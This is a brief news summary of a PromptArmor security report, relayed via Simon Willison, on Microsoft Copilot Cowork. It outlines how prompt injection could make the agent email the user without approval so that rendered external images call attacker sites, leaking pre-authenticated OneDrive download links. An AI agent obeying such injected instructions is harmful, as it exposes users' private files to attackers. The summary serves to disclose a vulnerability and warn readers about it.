Microsoft Copilot Cowork Exfiltrates Files

Copilot Cowork could be prompt-injected into leaking OneDrive file links through rendered email images.

Simon Willison summarizes a PromptArmor report about Microsoft Copilot Cowork and agentic data exfiltration risks. The issue involved agents sending messages to a user’s own inbox without approval, where rendered external images could trigger requests to attacker-controlled sites. Because OneDrive can create pre-authenticated download links, a successful prompt injection could leak links that allow attackers to download files.

摘要由 AI 整理,以原文為準。